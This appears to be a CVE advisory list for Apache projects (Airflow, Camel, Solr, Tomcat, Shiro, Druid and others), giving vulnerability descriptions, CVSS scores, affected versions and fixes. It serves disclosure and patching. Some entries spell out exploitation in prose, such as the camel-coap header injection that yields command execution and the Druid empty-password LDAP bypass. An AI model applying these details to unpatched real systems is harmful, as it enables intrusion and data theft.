CVE-2025-68280

Improper Restriction of XML External Entity Reference vulnerability in Apache SIS. It is possible to write XML files in such a way that, when parsed by Apache SIS, an XML file reveals to the attacker the content of a local file on the server running Apache SIS. This vulnerability impacts the following SIS services: * Reading of GeoTIFF files having the GEO_METADATA tag defined by the Defense Geospatial Information Working Group (DGIWG). * Parsing of ISO 19115 metadata in XML format. * Parsing of Coordinate Reference Systems defined in the GML format. * Parsing of files in GPS Exchange Format (GPX). This issue affects Apache SIS from versions 0.4 through 1.5 inclusive. Users are recommended to upgrade to version 1.6, which will fix the issue. In the meantime, the security vulnerability can be avoided by launching Java with the javax.xml.accessExternalDTD system property sets to a comma-separated list of authorized protocols. For example: java -Djavax.xml.accessExternalDTD="" ...

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache spatial_information_system *
CVE-2025-68493

Missing XML Validation vulnerability in Apache Struts, Apache Struts. This issue affects Apache Struts: from 2.0.0 before 2.2.1; Apache Struts: from 2.2.1 through 6.1.0. Users are recommended to upgrade to version 6.1.1, which fixes the issue.

Products Affected

Vendor Product Version
apache struts *
CVE-2025-68637

The Uniffle HTTP client is configured to trust all SSL certificates and disables hostname verification by default. This insecure configuration exposes all REST API communication between the Uniffle CLI/client and the Uniffle Coordinator service to potential Man-in-the-Middle (MITM) attacks. This issue affects all versions from before 0.10.0. Users are recommended to upgrade to version 0.10.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

Products Affected

Vendor Product Version
apache uniffle *
CVE-2025-68675

In Apache Airflow versions before 3.1.6, and 2.11.1 the proxies and proxy fields within a Connection may include proxy URLs containing embedded authentication information. These fields were not treated as sensitive by default and therefore were not automatically masked in log output. As a result, when such connections are rendered or printed to logs, proxy credentials embedded in these fields could be exposed. Users are recommended to upgrade to 3.1.6 or later for Airflow 3, and 2.11.1 or later for Airflow 2 which fixes this issue

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2025-69219

A user with access to the DB could craft a database entry that would result in executing code on Triggerer - which gives anyone who have access to DB the same permissions as Dag Author. Since direct DB access is not usual and recommended for Airflow, the likelihood of it making any damage is low. You should upgrade to version 6.0.0 of the provider to avoid even that risk.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache airflow_providers_http *
CVE-2026-22022

Deployments of Apache Solr 5.3.0 through 9.10.0 that rely on Solr's "Rule Based Authorization Plugin" are vulnerable to allowing unauthorized access to certain Solr APIs, due to insufficiently strict input validation in those components.  Only deployments that meet all of the following criteria are impacted by this vulnerability: * Use of Solr's "RuleBasedAuthorizationPlugin" * A RuleBasedAuthorizationPlugin config (see security.json) that specifies multiple "roles" * A RuleBasedAuthorizationPlugin permission list (see security.json) that uses one or more of the following pre-defined permission rules: "config-read", "config-edit", "schema-read", "metrics-read", or "security-read". * A RuleBasedAuthorizationPlugin permission list that doesn't define the "all" pre-defined permission * A networking setup that allows clients to make unfiltered network requests to Solr. (i.e. user-submitted HTTP/HTTPS requests reach Solr as-is, unmodified or restricted by any intervening proxy or gateway) Users can mitigate this vulnerability by ensuring that their RuleBasedAuthorizationPlugin configuration specifies the "all" pre-defined permission and associates the permission with an "admin" or other privileged role.  Users can also upgrade to a Solr version outside of the impacted range, such as the recently released Solr 9.10.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.2 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N 3.9 4.2

Products Affected

Vendor Product Version
apache solr *
CVE-2026-22444

The "create core" API of Apache Solr 8.6 through 9.10.0 lacks sufficient input validation on some API parameters, which can cause Solr to check the existence of and attempt to read file-system paths that should be disallowed by Solr's "allowPaths" security setting https://https://solr.apache.org/guide/solr/latest/configuration-guide/configuring-solr-xml.html#the-solr-element .  These read-only accesses can allow users to create cores using unexpected configsets if any are accessible via the filesystem.  On Windows systems configured to allow UNC paths this can additionally cause disclosure of NTLM "user" hashes.  Solr deployments are subject to this vulnerability if they meet the following criteria: * Solr is running in its "standalone" mode. * Solr's "allowPath" setting is being used to restrict file access to certain directories. * Solr's "create core" API is exposed and accessible to untrusted users.  This can happen if Solr's RuleBasedAuthorizationPlugin https://solr.apache.org/guide/solr/latest/deployment-guide/rule-based-authorization-plugin.html is disabled, or if it is enabled but the "core-admin-edit" predefined permission (or an equivalent custom permission) is given to low-trust (i.e. non-admin) user roles. Users can mitigate this by enabling Solr's RuleBasedAuthorizationPlugin (if disabled) and configuring a permission-list that prevents untrusted users from creating new Solr cores.  Users should also upgrade to Apache Solr 9.10.1 or greater, which contain fixes for this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.1 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N 2.8 4.2

Products Affected

Vendor Product Version
apache solr *
CVE-2026-22922

Apache Airflow versions 3.1.0 through 3.1.6 contain an authorization flaw that can allow an authenticated user with custom permissions limited to task access to view task logs without having task log access. Users are recommended to upgrade to Apache Airflow 3.1.7 or later, which resolves this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2026-23552

Cross-Realm Token Acceptance Bypass in KeycloakSecurityPolicy Apache Camel Keycloak component.  The Camel-Keycloak KeycloakSecurityPolicy does not validate the iss (issuer) claim of JWT tokens against the configured realm. A token issued by one Keycloak realm is silently accepted by a policy configured for a completely different realm, breaking tenant isolation. This issue affects Apache Camel: from 4.15.0 before 4.18.0. Users are recommended to upgrade to version 4.18.0, which fixes the issue.

Products Affected

Vendor Product Version
apache camel *
CVE-2026-23794

Reflected XSS in Apache Syncope's Enduser Login page. An attacker that tricks a legitimate user into clicking a malicious link and logging in to Syncope Enduser could steal that user's credentials. This issue affects Apache Syncope: from 3.0 through 3.0.15, from 4.0 through 4.0.3. Users are recommended to upgrade to version 3.0.16 / 4.0.4, which fix this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.8 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N 2.3 4.0

Products Affected

Vendor Product Version
apache syncope *
CVE-2026-23795

Improper Restriction of XML External Entity Reference vulnerability in Apache Syncope Console. An administrator with adequate entitlements to create or edit Keymaster parameters via Console can construct malicious XML text to launch an XXE attack, thereby causing sensitive data leakage occurs. This issue affects Apache Syncope: from 3.0 through 3.0.15, from 4.0 through 4.0.3. Users are recommended to upgrade to version 3.0.16 / 4.0.4, which fix this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 4.9 MEDIUM CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N 1.2 3.6

Products Affected

Vendor Product Version
apache syncope *
CVE-2026-23901

Observable Timing Discrepancy vulnerability in Apache Shiro. This issue affects Apache Shiro: from 1.*, 2.* before 2.0.7. Users are recommended to upgrade to version 2.0.7 or later, which fixes the issue. Prior to Shiro 2.0.7, code paths for non-existent vs. existing users are different enough, that a brute-force attack may be able to tell, by timing the requests only, determine if the request failed because of a non-existent user vs. wrong password. The most likely attack vector is a local attack only. Shiro security model  https://shiro.apache.org/security-model.html#username_enumeration  discusses this as well. Typically, brute force attack can be mitigated at the infrastructure level.

Products Affected

Vendor Product Version
apache shiro *
CVE-2026-23902

Incorrect Authorization vulnerability in Apache DolphinScheduler allows authenticated users with system login permissions to use tenants that are not defined on the platform during workflow execution. This issue affects Apache DolphinScheduler versions prior to 3.4.1.  Users are recommended to upgrade to version 3.4.1, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.1 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N 2.8 5.2

Products Affected

Vendor Product Version
apache dolphinscheduler *
CVE-2026-23903

Authentication Bypass by Alternate Name vulnerability in Apache Shiro. This issue affects Apache Shiro: before 2.0.7. Users are recommended to upgrade to version 2.0.7, which fixes the issue. The issue only effects static files. If static files are served from a case-insensitive filesystem, such as default macOS setup, static files may be accessed by varying the case of the filename in the request. If only lower-case (common default) filters are present in Shiro, they may be bypassed this way. Shiro 2.0.7 and later has a new parameters to remediate this issue shiro.ini: filterChainResolver.caseInsensitive = true application.propertie: shiro.caseInsensitive=true Shiro 3.0.0 and later (upcoming) makes this the default.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

Products Affected

Vendor Product Version
apache shiro *
CVE-2026-23906

Affected Products and Versions * Apache Druid * Affected Versions: 0.17.0 through 35.x (all versions prior to 36.0.0) * Prerequisites: * druid-basic-security extension enabled * LDAP authenticator configured * Underlying LDAP server permits anonymous bind                                                                                                                                                    Vulnerability Description An authentication bypass vulnerability exists in Apache Druid when using the druid-basic-security extension with LDAP authentication. If the underlying LDAP server is configured to allow anonymous binds, an attacker can bypass authentication by providing an existing username with an empty password. This allows unauthorized access to otherwise restricted Druid resources without valid credentials. The vulnerability stems from improper validation of LDAP authentication responses when anonymous binds are permitted, effectively treating anonymous bind success as valid user authentication. Impact A remote, unauthenticated attacker can: * Gain unauthorized access to the Apache Druid cluster * Access sensitive data stored in Druid datasources * Execute queries and potentially manipulate data * Access administrative interfaces if the bypassed account has elevated privileges * Completely compromise the confidentiality, integrity, and availability of the Druid deployment                                                                                                                                                                                     Mitigation   Immediate Mitigation (No Druid Upgrade Required):                                                                                                                                                   * Disable anonymous bind on your LDAP server. This prevents the vulnerability from being exploitable and is the recommended immediate action. Resolution * Upgrade Apache Druid to version 36.0.0 or later, which includes fixes to properly reject anonymous LDAP bind attempts.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache druid *
CVE-2026-23907

This issue affects the ExtractEmbeddedFiles example in Apache PDFBox: from 2.0.24 through 2.0.35, from 3.0.0 through 3.0.6. The ExtractEmbeddedFiles example contains a path traversal vulnerability (CWE-22) because the filename that is obtained from PDComplexFileSpecification.getFilename() is appended to the extraction path. Users who have copied this example into their production code should review it to ensure that the extraction path is acceptable. The example has been changed accordingly, now the initial path and the extraction paths are converted into canonical paths and it is verified that extraction path contains the initial path. The documentation has also been adjusted.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

Products Affected

Vendor Product Version
apache pdfbox *
CVE-2026-23969

Apache Superset utilizes a configurable dictionary, DISALLOWED_SQL_FUNCTIONS, to restrict the execution of potentially sensitive SQL functions within SQL Lab and charts. While this feature included restrictions for engines like PostgreSQL, a vulnerability was reported where the default list for the ClickHouse engine was incomplete. This issue affects Apache Superset: before 4.1.2. Users are recommended to upgrade to version 4.1.2, which fixes the issue.

Products Affected

Vendor Product Version
apache superset *
CVE-2026-23984

An Improper Input Validation vulnerability exists in Apache Superset that allows an authenticated user with SQLLab access to bypass the read-only verification check when using a PostgreSQL database connection. While the system effectively blocks standard Data Manipulation Language (DML) statements (e.g., INSERT, UPDATE, DELETE) on read-only connections, it fails to detect them in specially crafted SQL statements. This issue affects Apache Superset: before 6.0.0. Users are recommended to upgrade to version 6.0.0, which fixes the issue.

Products Affected

Vendor Product Version
apache superset *
CVE-2026-24015

A vulnerability in Apache IoTDB. This issue affects Apache IoTDB: from 1.0.0 before 1.3.7, from 2.0.0 before 2.0.7. Users are recommended to upgrade to version 1.3.7 or 2.0.7, which fixes the issue.

Products Affected

Vendor Product Version
apache iotdb *
CVE-2026-24098

Apache Airflow versions 3.0.0 - 3.1.7, has vulnerability that allows authenticated UI users with permission to one or more specific Dags to view import errors generated by other Dags they did not have access to. Users are advised to upgrade to 3.1.7 or later, which resolves this issue

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2026-24281

Hostname verification in Apache ZooKeeper ZKTrustManager falls back to reverse DNS (PTR) when IP SAN validation fails, allowing attackers who control or spoof PTR records to impersonate ZooKeeper servers or clients with a valid certificate for the PTR name. It's important to note that attacker must present a certificate which is trusted by ZKTrustManager which makes the attack vector harder to exploit. Users are recommended to upgrade to version 3.8.6 or 3.9.5, which fixes this issue by introducing a new configuration option to disable reverse DNS lookup in client and quorum protocols.

Products Affected

Vendor Product Version
apache zookeeper *
CVE-2026-24308

Improper handling of configuration values in ZKConfig in Apache ZooKeeper 3.8.5 and 3.9.4 on all platforms allows an attacker to expose sensitive information stored in client configuration in the client's logfile. Configuration values are exposed at INFO level logging rendering potential production systems affected by the issue. Users are recommended to upgrade to version 3.8.6 or 3.9.5 which fixes this issue.

Products Affected

Vendor Product Version
apache zookeeper *
CVE-2026-24343

Improper Neutralization of Data within XPath Expressions ('XPath Injection') vulnerability in Apache HertzBeat. This issue affects Apache HertzBeat: from 1.7.1 before 1.8.0. Users are recommended to upgrade to version 1.8.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache hertzbeat *
CVE-2026-24656

Deserialization of Untrusted Data vulnerability in Apache Karaf Decanter. The Decanter log socket collector exposes the port 4560, without authentication. If the collector exposes allowed classes property, this configuration can be bypassed. It means that the log socket collector is vulnerable to deserialization of untrusted data, eventually causing DoS. NB: Decanter log socket collector is not installed by default. Users who have not installed Decanter log socket are not impacted by this issue. This issue affects Apache Karaf Decanter before 2.12.0. Users are recommended to upgrade to version 2.12.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 3.7 LOW CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L 2.2 1.4

Products Affected

Vendor Product Version
apache karaf_decanter *
CVE-2026-24713

Improper Input Validation vulnerability in Apache IoTDB. This issue affects Apache IoTDB: from 1.0.0 before 1.3.7, from 2.0.0 before 2.0.7. Users are recommended to upgrade to version 1.3.7 or 2.0.7, which fixes the issue.

Products Affected

Vendor Product Version
apache iotdb *
CVE-2026-24733

Improper Input Validation vulnerability in Apache Tomcat. Tomcat did not limit HTTP/0.9 requests to the GET method. If a security constraint was configured to allow HEAD requests to a URI but deny GET requests, the user could bypass that constraint on GET requests by sending a (specification invalid) HEAD request using HTTP/0.9. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.14, from 10.1.0-M1 through 10.1.49, from 9.0.0.M1 through 9.0.112. Older, EOL versions are also affected. Users are recommended to upgrade to version 11.0.15 or later, 10.1.50 or later or 9.0.113 or later, which fixes the issue.

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 11.0.0
apache tomcat 9.0.0
apache tomcat 10.0.0
CVE-2026-24734

Improper Input Validation vulnerability in Apache Tomcat Native, Apache Tomcat. When using an OCSP responder, Tomcat Native (and Tomcat's FFM port of the Tomcat Native code) did not complete verification or freshness checks on the OCSP response which could allow certificate revocation to be bypassed. This issue affects Apache Tomcat Native:  from 1.3.0 through 1.3.4, from 2.0.0 through 2.0.11; Apache Tomcat: from 11.0.0-M1 through 11.0.17, from 10.1.0-M7 through 10.1.51, from 9.0.83 through 9.0.114. The following versions were EOL at the time the CVE was created but are known to be affected: from 1.1.23 through 1.1.34, from 1.2.0 through 1.2.39. Older EOL versions are not affected. Apache Tomcat Native users are recommended to upgrade to versions 1.3.5 or later or 2.0.12 or later, which fix the issue. Apache Tomcat users are recommended to upgrade to versions 11.0.18 or later, 10.1.52 or later or 9.0.115 or later which fix the issue.

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 10.1.0
apache tomcat 11.0.0
apache tomcat_native *
CVE-2026-24735

Exposure of Private Personal Information to an Unauthorized Actor vulnerability in Apache Answer. This issue affects Apache Answer: through 1.7.1. An unauthenticated API endpoint incorrectly exposes full revision history for deleted content. This allows unauthorized user to retrieve restricted or sensitive information. Users are recommended to upgrade to version 2.0.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache answer *
CVE-2026-25604

In AWS Auth manager, the origin of the SAML authentication has been used as provided by the client and not verified against the actual instance URL.  This allowed to gain access to different instances with potentially different access controls by reusing SAML response from other instances. You should upgrade to 9.22.0 version of provider if you use AWS Auth Manager.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N 2.8 2.5

Products Affected

Vendor Product Version
apache airflow_providers_amazon *
CVE-2026-25747

Deserialization of Untrusted Data vulnerability in Apache Camel LevelDB component. The Camel-LevelDB DefaultLevelDBSerializer class deserializes data read from the LevelDB aggregation repository using java.io.ObjectInputStream without applying any ObjectInputFilter or class-loading restrictions. An attacker who can write to the LevelDB database files used by a Camel application can inject a crafted serialized Java object that, when deserialized during normal aggregation repository operations, results in arbitrary code execution in the context of the application. This issue affects Apache Camel: from 4.10.0 before 4.10.8, from 4.14.0 before 4.14.5, from 4.15.0 before 4.18.0. Users are recommended to upgrade to version 4.18.0, which fixes the issue. For the 4.10.x LTS releases, users are recommended to upgrade to 4.10.9, while for 4.14.x LTS releases, users are recommended to upgrade to 4.14.5

Products Affected

Vendor Product Version
apache camel *
CVE-2026-25903

Apache NiFi 1.1.0 through 2.7.2 are missing authorization when updating configuration properties on extension components that have specific Required Permissions based on the Restricted annotation. The Restricted annotation indicates additional privileges required to add the annotated component to the flow configuration, but framework authorization did not check restricted status when updating a component previously added. The missing authorization requires a more privileged user to add a restricted component to the flow configuration, but permits a less privileged user to make property configuration changes. Apache NiFi installations that do not implement different levels of authorization for Restricted components are not subject to this vulnerability because the framework enforces write permissions as the security boundary. Upgrading to Apache NiFi 2.8.0 is the recommended mitigation.

Products Affected

Vendor Product Version
apache nifi *
CVE-2026-26929

Apache Airflow versions 3.0.0 through 3.1.7 FastAPI DagVersion listing API does not apply per-DAG authorization filtering when the request is made with dag_id set to "~" (wildcard for all DAGs). As a result, version metadata of DAGs that the requester is not authorized to access is returned. Users are recommended to upgrade to Apache Airflow 3.1.8 or later, which resolves this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2026-27172

The ConsulRegistry in the camel-consul component (class org.apache.camel.component.consul.ConsulRegistry and its inner ConsulRegistryUtils.deserialize method) read Java-serialized values from the Consul KV store and passed them to ObjectInputStream.readObject() without configuring an ObjectInputFilter. An attacker who can write to the Consul KV store backing a Camel ConsulRegistry instance could inject a malicious serialized Java object that is deserialized the next time Camel performs a lookup against that registry, leading to arbitrary code execution in the Camel process. The issue mirrors the class of vulnerability already addressed for other Camel components in CVE-2024-22369, CVE-2024-23114 and CVE-2026-25747, and was overlooked during the original remediation of those CVEs. This issue affects Apache Camel: from 3.0.0 before 4.14.6, from 4.15.0 before 4.18.1. Users are recommended to upgrade to version 4.19.0, which fixes the issue. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.6. If users are on the 4.18.x releases stream, then they are suggested to upgrade to 4.18.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache camel *
CVE-2026-27446

Missing Authentication for Critical Function (CWE-306) vulnerability in Apache Artemis, Apache ActiveMQ Artemis. An unauthenticated remote attacker can use the Core protocol to force a target broker to establish an outbound Core federation connection to an attacker-controlled rogue broker. This could potentially result in message injection into any queue and/or message exfiltration from any queue via the rogue broker. This impacts environments that allow both: - incoming Core protocol connections from untrusted sources to the broker - outgoing Core protocol connections from the broker to untrusted targets This issue affects: - Apache Artemis from 2.50.0 through 2.51.0 - Apache ActiveMQ Artemis from 2.11.0 through 2.44.0. Users are recommended to upgrade to Apache Artemis version 2.52.0, which fixes the issue. The issue can be mitigated by one of the following: - Remove Core protocol support from any acceptor receiving connections from untrusted sources. Incoming Core protocol connections are supported by default via the "artemis" acceptor listening on port 61616. See the "protocols" URL parameter configured for the acceptor. An acceptor URL without this parameter supports all protocols by default, including Core. - Use two-way SSL (i.e. certificate-based authentication) in order to force every client to present the proper SSL certificate when establishing a connection before any message protocol handshake is attempted. This will prevent unauthenticated exploitation of this vulnerability. - Implement and deploy a Core interceptor to deny all Core downstream federation connect packets. Such packets have a type of (int) -16 or (byte) 0xfffffff0. Documentation for interceptors is available at  https://artemis.apache.org/components/artemis/documentation/latest/intercepting-operations.html .

Products Affected

Vendor Product Version
apache activemq_artemis *
apache artemis 2.50.0
CVE-2026-28563

Apache Airflow versions 3.1.0 through 3.1.7 /ui/dependencies endpoint returns the full DAG dependency graph without filtering by authorized DAG IDs. This allows an authenticated user with only DAG Dependencies permission to enumerate DAGs they are not authorized to view. Users are recommended to upgrade to Apache Airflow 3.1.8 or later, which resolves this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache airflow *
CVE-2026-28779

Apache Airflow versions 3.1.0 through 3.1.7 session token (_token) in cookies is set to path=/ regardless of the configured [webserver] base_url or [api] base_url. This allows any application co-hosted under the same domain to capture valid Airflow session tokens from HTTP request headers, allowing full session takeover without attacking Airflow itself. Users are recommended to upgrade to Apache Airflow 3.1.8 or later, which resolves this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache airflow *
CVE-2026-30911

Apache Airflow versions 3.1.0 through 3.1.7 missing authorization vulnerability in the Execution API's Human-in-the-Loop (HITL) endpoints that allows any authenticated task instance to read, approve, or reject HITL workflows belonging to any other task instance. Users are recommended to upgrade to Apache Airflow 3.1.8 or later, which resolves this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.1 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N 2.8 5.2

Products Affected

Vendor Product Version
apache airflow *
CVE-2026-32642

Incorrect Authorization (CWE-863) vulnerability in Apache Artemis, Apache ActiveMQ Artemis exists when an application using the OpenWire protocol attempts to create a non-durable JMS topic subscription on an address that doesn't exist with an authenticated user which has the "createDurableQueue" permission but does not have the "createAddress" permission and address auto-creation is disabled. In this circumstance, a temporary address will be created whereas the attempt to create the non-durable subscription should instead fail since the user is not authorized to create the corresponding address. When the OpenWire connection is closed the address is removed. This issue affects Apache Artemis: from 2.50.0 through 2.52.0; Apache ActiveMQ Artemis: from 2.0.0 through 2.44.0. Users are recommended to upgrade to version 2.53.0, which fixes the issue.

Products Affected

Vendor Product Version
apache artemis *
apache activemq_artemis *
CVE-2026-32794

Improper Certificate Validation vulnerability in Apache Airflow Provider for Databricks. Provider code did not validate certificates for connections to Databricks back-end which could result in a man-of-a-middle attack that traffic is intercepted and manipulated or credentials exfiltrated w/o notice. This issue affects Apache Airflow Provider for Databricks: from 1.10.0 before 1.12.0. Users are recommended to upgrade to version 1.12.0, which fixes the issue.

Products Affected

Vendor Product Version
apache airflow_providers_databricks *
CVE-2026-33453

Improperly Controlled Modification of Dynamically-Determined Object Attributes vulnerability in Apache Camel Camel-Coap component. Apache Camel's camel-coap component is vulnerable to Camel message header injection, leading to remote code execution when routes forward CoAP requests to header-sensitive producers (e.g. camel-exec) The camel-coap component maps incoming CoAP request URI query parameters directly into Camel Exchange In message headers without applying any HeaderFilterStrategy.   Specifically, CamelCoapResource.handleRequest() iterates over OptionSet.getUriQuery() and calls camelExchange.getIn().setHeader(...) for every query parameter. CoAPEndpoint extends DefaultEndpoint rather than DefaultHeaderFilterStrategyEndpoint, and CoAPComponent does not implement HeaderFilterStrategyComponent; the component contains no references to HeaderFilterStrategy at all. As a result, an unauthenticated attacker who can send a single CoAP UDP packet to a Camel route consuming from coap:// can inject arbitrary Camel internal headers (those prefixed with Camel*) into the Exchange. When the route delivers the message to a header-sensitive producer such as camel-exec, camel-sql, camel-bean, camel-file, or template components (camel-freemarker, camel-velocity), the injected headers can alter the producer's behavior. In the case of camel-exec, the CamelExecCommandExecutable and CamelExecCommandArgs headers override the executable and arguments configured on the endpoint, resulting in arbitrary OS command execution under the privileges of the Camel process. The producer's output is written back to the Exchange body and returned in the CoAP response payload by CamelCoapResource, giving the attacker an interactive RCE channel without any need for out-of-band exfiltration.                                                                                                                                                                         Exploitation prerequisites are minimal: a single unauthenticated UDP datagram to the CoAP port (default 5683). CoAP (RFC 7252) has no built-in authentication, and DTLS is optional and disabled by default. Because the protocol is UDP-based, HTTP-layer WAF/IDS controls do not apply. This issue affects Apache Camel: from 4.14.0 through 4.14.5, from 4.18.0 before 4.18.1, 4.19.0. Users are recommended to upgrade to version 4.18.1 or 4.19.0, fixing the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 10.0 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H 3.9 6.0

Products Affected

Vendor Product Version
apache camel 4.19.0
apache camel *
apache camel 4.18.0
CVE-2026-33454

The Camel-Mail component is vulnerable to Camel message header injection. The custom header filter strategy used by the component (MailHeaderFilterStrategy) only filters the 'out' direction via setOutFilterStartsWith, while it does not configure the 'in' direction via setInFilterStartsWith. As a result, when a Camel application consumes mail through camel-mail (for example via from(\"imap://...\") or from(\"pop3://...\")) the inbound filter check is skipped and Camel-prefixed MIME headers are mapped unfiltered into the Exchange. An attacker who can deliver an email to a mailbox monitored by such a consumer can inject Camel-specific headers that, for some Camel components downstream of the mail consumer (such as camel-bean, camel-exec, or camel-sql), can alter the behaviour of the route. This is the same pattern that was previously addressed in camel-undertow (CVE-2025-30177) and the broader incoming-header filter (CVE-2025-27636 and CVE-2025-29891). This issue affects Apache Camel: from 3.0.0 before 4.14.6, from 4.15.0 before 4.18.1. Users are recommended to upgrade to version 4.19.0, which fixes the issue. If users are on the 4.18.x LTS releases stream, then they are suggested to upgrade to 4.18.1. If users are on the 4.14.x LTS releases stream, then they are suggested to upgrade to 4.14.6.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.4 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L 3.9 5.5

Products Affected

Vendor Product Version
apache camel *
CVE-2026-34478

Apache Log4j Core's Rfc5424Layout https://logging.apache.org/log4j/2.x/manual/layouts.html#RFC5424Layout , in versions 2.21.0 through 2.25.3, is vulnerable to log injection via CRLF sequences due to undocumented renames of security-relevant configuration attributes. Two distinct issues affect users of stream-based syslog services who configure Rfc5424Layout directly: * The newLineEscape attribute was silently renamed, causing newline escaping to stop working for users of TCP framing (RFC 6587), exposing them to CRLF injection in log output. * The useTlsMessageFormat attribute was silently renamed, causing users of TLS framing (RFC 5425) to be silently downgraded to unframed TCP (RFC 6587), without newline escaping. Users of the SyslogAppender are not affected, as its configuration attributes were not modified. Users are advised to upgrade to Apache Log4j Core 2.25.4, which corrects this issue.

